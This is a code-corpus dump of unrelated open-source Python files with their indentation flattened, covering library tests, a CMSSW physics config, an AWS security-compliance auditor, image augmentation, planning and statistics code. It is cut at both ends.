f = open(path + filenames_chunk[i], "r")
        print(f.name)
ddfs.chunk(tags_chunk[i], [f.name])
|
descarteslabs/workflows/types/primitives/tests/test_string.py | carderne/descarteslabs-python | 167 | 12728262 |
import operator
import pytest
from ...containers import Tuple, List
from ..bool_ import Bool
from ..number import Int
from ..string import Str
@pytest.mark.parametrize(
"other, result_type, op, reflected",
[
(Str(""), Str, operator.add, True),
(Int(1), Str, operator.mul, False),
(Str(""), Bool, operator.lt, False),
(Str(""), Bool, operator.le, False),
(Str(""), Bool, operator.eq, False),
(Str(""), Bool, operator.ge, False),
(Str(""), Bool, operator.gt, False),
(Str(""), Bool, operator.ne, False),
],
)
def test_supported_binary_methods(other, result_type, op, reflected):
assert isinstance(op(Str(""), other), result_type)
if reflected:
assert isinstance(op(other, Str("")), result_type)
def test_contains():
with pytest.raises(TypeError):
Str("") in Str("")
assert isinstance(Str("").contains(Str("")), Bool)
def test_reversed():
assert isinstance(reversed(Str("")), Str)
def test_length():
with pytest.raises(TypeError):
len(Str(""))
assert isinstance(Str("").length(), Int)
@pytest.mark.parametrize(
"method, return_type, args",
[
# custom
("contains", Bool, [""]),
("length", Int, []),
# from python
("capitalize", Str, []),
("center", Str, [1]),
("count", Int, [""]),
# ("decode", Str, []), # TODO need more types to implement
# ("encode", Str, []), # TODO need more types to implement
("endswith", Bool, [""]),
("expandtabs", Str, []),
("find", Int, [""]),
("format", Str, [""]),
("__getitem__", Str, [0]),
("__getitem__", Str, [slice(0, 1, 0)]),
("isalnum", Bool, []),
("isalpha", Bool, []),
("isdigit", Bool, []),
("islower", Bool, []),
("isspace", Bool, []),
("istitle", Bool, []),
("isupper", Bool, []),
("join", Str, [("a", "b")]),
("ljust", Str, [1]),
("lower", Str, []),
("lstrip", Str, []),
("partition", Tuple[Str, Str, Str], [""]),
("replace", Str, ["", ""]),
("rfind", Int, [""]),
("rjust", Str, [1]),
("rpartition", Tuple[Str, Str, Str], [""]),
("rsplit", List[Str], [""]),
("rstrip", Str, []),
("split", List[Str], [""]),
("splitlines", List[Str], []),
("startswith", Bool, [""]),
("strip", Str, []),
("swapcase", Str, []),
("title", Str, []),
("upper", Str, []),
("zfill", Str, [0]),
],
)
def test_has_methods(method, return_type, args):
s = Str("")
out = getattr(s, method)(*args)
assert isinstance(out, return_type)
|
DQMOffline/Trigger/python/HLTMuonOfflineAnalyzer_cosmics_cff.py | ckamtsikis/cmssw | 852 | 12728276 |
import FWCore.ParameterSet.Config as cms
from DQMOffline.Trigger.HLTMuonOfflineAnalyzer_cfi import hltMuonOfflineAnalyzer
barrelMuonParams = cms.PSet(
d0Cut = cms.untracked.double(1000.0),
z0Cut = cms.untracked.double(1000.0),
recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) < 0.9"),
hltCuts = cms.untracked.string("abs(eta) < 0.9"),
)
endcapMuonParams = cms.PSet(
d0Cut = cms.untracked.double(1000.0),
z0Cut = cms.untracked.double(1000.0),
recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) > 1.4 && "
"abs(eta) < 2.0"),
hltCuts = cms.untracked.string("abs(eta) > 1.4 && abs(eta) < 2.0"),
)
allMuonParams = cms.PSet(
d0Cut = cms.untracked.double(1000.0),
z0Cut = cms.untracked.double(1000.0),
recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) < 2.0"),
hltCuts = cms.untracked.string("abs(eta) < 2.0"),
)
barrelAnalyzer = hltMuonOfflineAnalyzer.clone()
barrelAnalyzer.destination = "HLT/Muon/DistributionsBarrel"
barrelAnalyzer.targetParams = barrelMuonParams
barrelAnalyzer.probeParams = cms.PSet()
endcapAnalyzer = hltMuonOfflineAnalyzer.clone()
endcapAnalyzer.destination = "HLT/Muon/DistributionsEndcap"
endcapAnalyzer.targetParams = endcapMuonParams
endcapAnalyzer.probeParams = cms.PSet()
allAnalyzer = hltMuonOfflineAnalyzer.clone()
allAnalyzer.destination = "HLT/Muon/DistributionsAll"
allAnalyzer.targetParams = allMuonParams
allAnalyzer.probeParams = allMuonParams
hltMuonOfflineAnalyzers = cms.Sequence(
barrelAnalyzer *
endcapAnalyzer *
allAnalyzer
)
|
dbaas/account/serializers.py | didindinn/database-as-a-service | 303 | 12728296 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django_services.api import DjangoServiceSerializer
from .models import Team, AccountUser
class TeamSerializer(DjangoServiceSerializer):
class Meta:
model = Team
class UserSerializer(DjangoServiceSerializer):
class Meta:
model = AccountUser
|
eeauditor/auditors/aws/Amazon_EC2_Image_Builder_Auditor.py | kbhagi/ElectricEye | 442 | 12728306 | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import json
from check_register import CheckRegister
registry = CheckRegister()
imagebuilder = boto3.client("imagebuilder")
@registry.register_check("imagebuilder")
def imagebuilder_pipeline_tests_enabled_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ImageBuilder.1] Image pipeline tests should be enabled"""
pipelines = imagebuilder.list_image_pipelines()
pipeline_list = pipelines["imagePipelineList"]
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for arn in pipeline_list:
pipelineArn = arn["arn"]
pipeline_name = arn["name"]
image_pipelines = imagebuilder.get_image_pipeline(imagePipelineArn=pipelineArn)
image_test_config = image_pipelines["imagePipeline"]["imageTestsConfiguration"]
image_test_enabled = image_test_config["imageTestsEnabled"]
if image_test_enabled == True:
finding = {
"SchemaVersion": "2018-10-08",
"Id": pipelineArn + "/imagebuilder-pipeline-tests-enabled-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": pipelineArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ImageBuilder.1] Image pipeline tests should be enabled",
"Description": "Image pipeline " + pipeline_name + " has tests enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and enabling image testing refer to the Best Practices section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/security-best-practices.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderPipeline",
"Id": pipelineArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderPipeline": {"PipelineName": pipeline_name}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": pipelineArn + "/imagebuilder-pipeline-tests-enabled-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": pipelineArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ImageBuilder.1] Image pipeline tests should be enabled",
"Description": "Image pipeline " + pipeline_name + " does not have tests enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and enabling image testing refer to the Best Practices section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/security-best-practices.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderPipeline",
"Id": pipelineArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderPipeline": {"PipelineName": pipeline_name}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
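# The companion check below follows the same pattern: one ASFF finding is yielded per
# resource, with passing findings archived/resolved and failing ones left active for triage.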
@registry.register_check("imagebuilder")
def imagebuilder_ebs_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ImageBuilder.2] Image recipes should encrypt EBS volumes"""
recipes = imagebuilder.list_image_recipes()
recipes_list = recipes["imageRecipeSummaryList"]
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for details in recipes_list:
recipeArn = details["arn"]
recipe_name = details["name"]
recipe = imagebuilder.get_image_recipe(imageRecipeArn=recipeArn)
device_mapping = recipe["imageRecipe"]["blockDeviceMappings"]
list1 = device_mapping[0]
ebs = list1["ebs"]
ebs_encryption = ebs["encrypted"]
if ebs_encryption == True:
finding = {
"SchemaVersion": "2018-10-08",
"Id": recipeArn + "/imagebuilder-ebs-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": recipeArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ImageBuilder.2] Image recipes should encrypt EBS volumes",
"Description": "Image recipe " + recipe_name + " has EBS encrypted.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and EBS encyption refer to the How EC2 Image Builder Works section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/how-image-builder-works.html#image-builder-components",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderRecipe",
"Id": recipeArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderRecipe": {"RecipeName": recipe_name}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": recipeArn + "/imagebuilder-ebs-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": recipeArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ImageBuilder.2] Image recipes should encrypt EBS volumes",
"Description": "Image recipe " + recipe_name + " does not have EBS encrypted.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and EBS encyption refer to the How EC2 Image Builder Works section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/how-image-builder-works.html#image-builder-components",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderRecipe",
"Id": recipeArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderRecipe": {"RecipeName": recipe_name}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding |
examples/brtdp_example.py | david-abel/mdps | 230 | 12728315 | # Python imports.
from collections import defaultdict
import copy
# Other imports.
from simple_rl.planning import Planner
from simple_rl.planning import ValueIteration
from simple_rl.tasks import GridWorldMDP
from simple_rl.planning.BoundedRTDPClass import BoundedRTDP
class MonotoneLowerBound(Planner):
def __init__(self, mdp, name='MonotoneUpperBound'):
relaxed_mdp = MonotoneLowerBound._construct_deterministic_relaxation_mdp(mdp)
Planner.__init__(self, relaxed_mdp, name)
self.vi = ValueIteration(relaxed_mdp)
self.states = self.vi.get_states()
self.vi._compute_matrix_from_trans_func()
self.vi.run_vi()
self.lower_values = self._construct_lower_values()
@staticmethod
def _construct_deterministic_relaxation_mdp(mdp):
relaxed_mdp = copy.deepcopy(mdp)
relaxed_mdp.set_slip_prob(0.0)
return relaxed_mdp
def _construct_lower_values(self):
values = defaultdict()
for state in self.states:
values[state] = self.vi.get_value(state)
return values
class MonotoneUpperBound(Planner):
def __init__(self, mdp, name='MonotoneUpperBound'):
Planner.__init__(self, mdp, name)
self.vi = ValueIteration(mdp)
self.states = self.vi.get_states()
self.upper_values = self._construct_upper_values()
def _construct_upper_values(self):
values = defaultdict()
for state in self.states:
values[state] = 1. / (1. - self.gamma)
return values
def main():
test_mdp = GridWorldMDP(width=6, height=6, goal_locs=[(6, 6)], slip_prob=0.2)
lower_value_function = MonotoneLowerBound(test_mdp).lower_values
upper_value_function = MonotoneUpperBound(test_mdp).upper_values
bounded_rtdp = BoundedRTDP(test_mdp, lower_values_init=lower_value_function, upper_values_init=upper_value_function)
test_policy = bounded_rtdp.plan()
print('Derived policy:\n{}'.format(test_policy))
if __name__ == '__main__':
main()
|
tests/test_provider_circonus_labs_circonus.py | mjuenema/python-terrascript | 507 | 12728316 |
# tests/test_provider_circonus-labs_circonus.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:13:59 UTC)
def test_provider_import():
import terrascript.provider.circonus_labs.circonus
def test_resource_import():
from terrascript.resource.circonus_labs.circonus import circonus_check
from terrascript.resource.circonus_labs.circonus import circonus_contact_group
from terrascript.resource.circonus_labs.circonus import circonus_dashboard
from terrascript.resource.circonus_labs.circonus import circonus_graph
from terrascript.resource.circonus_labs.circonus import circonus_maintenance
from terrascript.resource.circonus_labs.circonus import circonus_metric
from terrascript.resource.circonus_labs.circonus import circonus_overlay_set
from terrascript.resource.circonus_labs.circonus import circonus_rule_set
from terrascript.resource.circonus_labs.circonus import circonus_rule_set_group
from terrascript.resource.circonus_labs.circonus import circonus_worksheet
def test_datasource_import():
from terrascript.data.circonus_labs.circonus import circonus_account
from terrascript.data.circonus_labs.circonus import circonus_collector
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.circonus_labs.circonus
#
# t = terrascript.provider.circonus_labs.circonus.circonus()
# s = str(t)
#
# assert 'https://github.com/circonus-labs/terraform-provider-circonus' in s
# assert '0.12.2' in s
|
colorsublime/commands.py | adrianebohrer/Colorsublime-Plugin | 495 | 12728318 | """
Collection of functions the plugin can invoke. Most if not all should be
non-blocking (@async) functions to keep the main UI thread from freezing.
These functions should catch all unexpected exceptions so the plugin does not
have to. Unexpected exceptions should return False. Expected exceptions should
be caught by other modules this module uses. Log all unusual behavior.
All @async functions have an optional callback parameter as the last argument.
"""
import os
from . import logger
from . import settings
from . import http
from . import io
from .async import async
from .theme import Theme
log = logger.get(__name__)
def get_current_theme():
return settings.get_current_theme()
def get_installed_themes():
theme_filenames = os.listdir(settings.install_path())
themes = []
for t in theme_filenames:
if t.endswith('.tmTheme'):
name = t.replace('.tmTheme', '')
themes.append(Theme(name=name, file_name=t))
themes.sort()
return themes
@async
def fetch_repo():
""" Get current theme archive in a new thread """
archive = http.get(settings.repo_url())
io.extract(archive, settings.cache_path())
themes_list = io.read_json(settings.themes_list_path())
themes = [Theme.from_json(theme) for theme in themes_list]
themes = {t.name: t for t in themes}
return themes
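# Per the module docstring, the @async decorator lets callers pass an optional trailing
# callback that receives fetch_repo's {name: Theme} dict without blocking the UI thread.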
def _exists(theme):
if not os.path.exists(theme.cache_path.abs):
log.error('Path %s not found!', theme.cache_path.abs)
return False
return True
def preview_theme(theme):
log.debug('Previewing theme %s at %s', theme.name, theme.cache_path.abs)
if not _exists(theme):
return
settings.set_theme(theme.cache_path.rel)
def install_theme(theme):
log.debug('Installing theme %s to %s', theme.name, theme.install_path.abs)
if not _exists(theme):
return
io.copy(theme.cache_path.abs, theme.install_path.abs)
settings.set_theme(theme.install_path.rel)
settings.commit()
def revert_theme(path):
log.debug('Reverting theme at path %s', path)
settings.set_theme(path)
def uninstall_theme(theme):
os.remove(theme.install_path.abs)
|
src/textual/views/_grid_view.py | dpoehls/textual | 6,706 | 12728326 | from ..view import View
from ..layouts.grid import GridLayout
class GridView(View, layout=GridLayout):
@property
def grid(self) -> GridLayout:
assert isinstance(self.layout, GridLayout)
return self.layout
|
notebooks/exercise_solutions/n03_kinematics_define-frame.py | pydy/pydy-tutorial-human-standing | 134 | 12728338 | upper_leg_frame = ReferenceFrame('U')
torso_frame = ReferenceFrame('T') |
tests/test_stats.py | almartin82/bayeslite | 964 | 12728355 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import pytest
import bayeslite.stats as stats
from bayeslite.math_util import relerr
def abserr(expected, actual):
"""Computes the absolute error between `expected` and `actual`.
:param float expected: The expected value.
:param float actual: The actual value.
:return: ``abs(actual-expected)``
:rtype: float
"""
return abs(actual - expected)
def test_pearsonr():
assert math.isnan(stats.pearsonr([], []))
assert stats.pearsonr([1,2,3], [2,4,6]) == +1.0
assert stats.pearsonr([1,2,3], [-2,-4,-6]) == -1.0
assert stats.pearsonr([1,2,3], [6,4,2]) == -1.0
assert stats.pearsonr([1,2,3], [+1,-1,+1]) == 0.0
def test_chi2_contingency():
assert stats.chi2_contingency([[42]]) == 0.
assert relerr(7.66, stats.chi2_contingency([[4,2,3], [3,16,2]])) < 0.01
def test_f_oneway():
data = [[6,8,4,5,3,4], [8,12,9,11,6,8], [13,9,11,8,7,12]]
assert relerr(9.3, stats.f_oneway(data)) < 0.01
def test_chi2_sf():
# Non-positive degrees of freedom should throw an error.
with pytest.raises(ValueError):
stats.chi2_sf(0, 0)
with pytest.raises(ValueError):
stats.chi2_sf(2, -10)
# Survival of x = 0 should be 1.
assert relerr(1., stats.chi2_sf(0,12)) < .05
assert relerr(1., stats.chi2_sf(0,6)) < .05
assert relerr(1., stats.chi2_sf(0,130)) < .05
# Test x < 1, x >= df against reference values.
assert relerr(.0357175, stats.chi2_sf(.8,.1)) < .05
assert relerr(.2730426, stats.chi2_sf(.6,.6)) < .05
assert relerr(.0602823, stats.chi2_sf(.1,.05)) < .05
# Test x >= 1, x <= df against reference values.
assert relerr(.7029304, stats.chi2_sf(9,12)) < .05
assert relerr(.5934191, stats.chi2_sf(1.9,3)) < .05
assert relerr(.9238371, stats.chi2_sf(1,4.2)) < .05
# Test x >= 1, x > df against reference values.
assert relerr(.3325939, stats.chi2_sf(8,7)) < .05
assert relerr(.0482861, stats.chi2_sf(3.9,1)) < .05
assert relerr(.3464377e-4, stats.chi2_sf(193,121)) < .05
def test_f_sf():
# Non-positive degrees of freedom should throw an error.
with pytest.raises(ValueError):
stats.f_sf(0,0,0)
with pytest.raises(ValueError):
stats.f_sf(2,-10,0)
with pytest.raises(ValueError):
stats.f_sf(2,0,-10)
with pytest.raises(ValueError):
stats.f_sf(2,-1,1)
with pytest.raises(ValueError):
stats.f_sf(2,1,-1)
# Survival of x = 0 should be 1.
assert relerr(1, stats.f_sf(0,1,12)) < .05
assert relerr(1, stats.f_sf(0,6,0.5)) < .05
assert relerr(1, stats.f_sf(0,130,121)) < .05
# Survival of x < 0 should be 1.
assert relerr(1, stats.f_sf(-1,1,12)) < .05
assert relerr(1, stats.f_sf(-100,6,0.5)) < .05
assert relerr(1, stats.f_sf(-0.02,130,121)) < .05
# Test against reference values.
assert relerr(.5173903, stats.f_sf(1,12,8)) < .05
assert relerr(.2618860, stats.f_sf(1.9,1,3)) < .05
assert relerr(.5000000, stats.f_sf(1,100,100)) < .05
assert relerr(.1781364, stats.f_sf(19,14,1)) < .05
assert relerr(.7306588, stats.f_sf(0.76,23,15)) < .05
assert relerr(.0602978, stats.f_sf(4.3,1,12)) < .05
assert relerr(.5590169, stats.f_sf(1.1,2,1)) < .05
assert relerr(.1111111, stats.f_sf(8,2,2)) < .05
assert relerr(.9999999, stats.f_sf(0.2,432,123)) < .05
assert relerr(.9452528, stats.f_sf(0.8,432,123)) < .05
assert relerr(.0434186, stats.f_sf(10,5,3)) < .05
# Test against reference very close to zero.
assert abserr(.0158130, stats.f_sf(11,19,4)) < .01
assert abserr(.0022310, stats.f_sf(14,9,6)) < .01
assert abserr(.1458691e-112, stats.f_sf(200,432,123)) < .01
assert abserr(.2489256e-13, stats.f_sf(29,23,29)) < .01
assert abserr(.1656276e-06, stats.f_sf(31,11,13)) < .01
assert abserr(.6424023e-5, stats.f_sf(18,14,12)) < .01
def test_t_cdf():
# Non-positive degrees of freedom should throw an error.
with pytest.raises(ValueError):
stats.t_cdf(0,0)
with pytest.raises(ValueError):
stats.t_cdf(2,-10)
# CDF of x = 0 should be 0.5.
assert relerr(.5, stats.t_cdf(0,12)) < .01
assert relerr(.5, stats.t_cdf(0,6)) < .01
assert relerr(.5, stats.t_cdf(0,130)) < .01
# Test against various reference values.
assert relerr(.57484842931039226, stats.t_cdf(.8, .1)) < .05
assert relerr(.64922051214061649, stats.t_cdf(.6, .6)) < .05
assert relerr(.51046281131211058, stats.t_cdf(.1, .05)) < .05
assert relerr(.99999944795492968, stats.t_cdf(9, 12)) < .05
assert relerr(.92318422834700042, stats.t_cdf(1.9, 3)) < .05
assert relerr(.81430689864299455, stats.t_cdf(1, 4.2)) < .05
assert relerr(.99995442539414559, stats.t_cdf(8, 7)) < .05
assert relerr(.92010336338282994, stats.t_cdf(3.9, 1)) < .05
assert relerr(1.0, stats.t_cdf(193, 121)) < .05
assert relerr(.42515157068960779, stats.t_cdf(-.8, .1)) < .05
assert relerr(.35077948785938345, stats.t_cdf(-.6, .6)) < .05
assert relerr(.48953718868788948, stats.t_cdf(-.1, .05)) < .05
assert relerr(.076815771652999562, stats.t_cdf(-1.9, 3)) < .05
assert relerr(.18569310135700545, stats.t_cdf(-1, 4.2)) < .05
assert relerr(.17530833141010374, stats.t_cdf(-1, 7)) < .05
assert relerr(.079896636617170003, stats.t_cdf(-3.9, 1)) < .05
assert relerr(.30899158341328747, stats.t_cdf(-0.5, 121)) < .05
# Test against reference very close to zero.
# XXX Why are we testing chi2_sf here?
assert relerr(.346437e-4, stats.chi2_sf(193,121)) < .01
def test_gauss_suff_stats():
# High mean, tiny variance would lead to catastrophic cancellation
# in a naive implementation that maintained the sum of squares.
big = 400
small = 0.0000001
data = [big - small, big, big + small]
true_sigma = math.sqrt(2 * small**2 / 3)
(ct, mean, sigma) = stats.gauss_suff_stats(data)
assert ct == 3
assert mean == big
assert relerr(true_sigma, sigma) < 1e-5
|
jesse/strategies/Test38/__init__.py | noenfugler/jesse | 3,999 | 12728373 | from jesse.strategies import Strategy
# test_average_take_profit_exception
class Test38(Strategy):
def should_long(self) -> bool:
return self.index == 0
def should_short(self) -> bool:
return False
def go_long(self):
qty = 1
self.buy = qty, 2
self.stop_loss = qty, 1
def go_short(self):
pass
def should_cancel(self):
return False
def filters(self):
return [self.filter_1]
def filter_1(self):
# trying to access average_take_profit without setting it first
return self.average_take_profit > 1
|
albumentations/augmentations/dropout/mask_dropout.py | Multihuntr/albumentations | 3,893 | 12728403 | import random
from typing import Union, Tuple, Any, Dict
import cv2
import numpy as np
from skimage.measure import label
from ...core.transforms_interface import DualTransform
from ...core.transforms_interface import to_tuple
__all__ = ["MaskDropout"]
class MaskDropout(DualTransform):
"""
    Image & mask augmentation that zeroes out the mask and image regions corresponding
    to a randomly chosen object instance from the mask.
    The mask must be a single-channel image; zero values are treated as background.
Image can be any number of channels.
Inspired by https://www.kaggle.com/c/severstal-steel-defect-detection/discussion/114254
Args:
max_objects: Maximum number of labels that can be zeroed out. Can be tuple, in this case it's [min, max]
image_fill_value: Fill value to use when filling image.
            Can be 'inpaint' to apply inpainting (works only for 3-channel images)
mask_fill_value: Fill value to use when filling mask.
Targets:
image, mask
Image types:
uint8, float32
"""
def __init__(
self,
max_objects: int = 1,
image_fill_value: Union[int, float, str] = 0,
mask_fill_value: Union[int, float] = 0,
always_apply: bool = False,
p: float = 0.5,
):
super(MaskDropout, self).__init__(always_apply, p)
self.max_objects = to_tuple(max_objects, 1)
self.image_fill_value = image_fill_value
self.mask_fill_value = mask_fill_value
@property
def targets_as_params(self):
return ["mask"]
def get_params_dependent_on_targets(self, params) -> Dict[str, Any]:
mask = params["mask"]
label_image, num_labels = label(mask, return_num=True)
if num_labels == 0:
dropout_mask = None
else:
objects_to_drop = random.randint(self.max_objects[0], self.max_objects[1])
objects_to_drop = min(num_labels, objects_to_drop)
if objects_to_drop == num_labels:
dropout_mask = mask > 0
else:
labels_index = random.sample(range(1, num_labels + 1), objects_to_drop)
dropout_mask = np.zeros((mask.shape[0], mask.shape[1]), dtype=bool)
for label_index in labels_index:
dropout_mask |= label_image == label_index
params.update({"dropout_mask": dropout_mask})
return params
def apply(self, img: np.ndarray, dropout_mask: np.ndarray = None, **params) -> np.ndarray:
if dropout_mask is None:
return img
if self.image_fill_value == "inpaint":
dropout_mask = dropout_mask.astype(np.uint8)
_, _, w, h = cv2.boundingRect(dropout_mask)
radius = min(3, max(w, h) // 2)
img = cv2.inpaint(img, dropout_mask, radius, cv2.INPAINT_NS)
else:
img = img.copy()
img[dropout_mask] = self.image_fill_value
return img
def apply_to_mask(self, img: np.ndarray, dropout_mask: np.ndarray = None, **params) -> np.ndarray:
if dropout_mask is None:
return img
img = img.copy()
img[dropout_mask] = self.mask_fill_value
return img
def get_transform_init_args_names(self) -> Tuple[str, ...]:
return "max_objects", "image_fill_value", "mask_fill_value"
|
model/central.py | Misterion777/ConceptFlow | 107 | 12728432 |
#coding:utf-8
import torch
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
from torch.nn import utils as nn_utils
from .embedding import WordEmbedding, EntityEmbedding, use_cuda, VERY_SMALL_NUMBER, VERY_NEG_NUMBER
class CentralEncoder(nn.Module):
def __init__(self, config, gnn_layers, embed_units, trans_units, word_embedding, entity_embedding):
super(CentralEncoder, self).__init__()
self.k = 2 + 1
self.gnn_layers = gnn_layers
self.WordEmbedding = word_embedding
self.EntityEmbedding = entity_embedding
self.embed_units = embed_units
self.trans_units = trans_units
self.pagerank_lambda = config.pagerank_lambda
self.fact_scale = config.fact_scale
self.node_encoder = nn.LSTM(input_size = self.embed_units, hidden_size = self.trans_units, batch_first=True, bidirectional=False)
self.lstm_drop = nn.Dropout(p = config.lstm_dropout)
self.softmax_d1 = nn.Softmax(dim = 1)
self.linear_drop = nn.Dropout(p = config.linear_dropout)
self.relu = nn.ReLU()
for i in range(self.gnn_layers):
self.add_module('q2e_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('d2e_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('e2q_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units))
self.add_module('e2d_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units))
self.add_module('e2e_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units))
#use kb
self.add_module('kb_head_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('kb_tail_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('kb_self_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
def forward(self, batch_size, max_local_entity, max_fact, query_text, local_entity, q2e_adj_mat, kb_adj_mat, kb_fact_rel, query_mask):
# normalized adj matrix
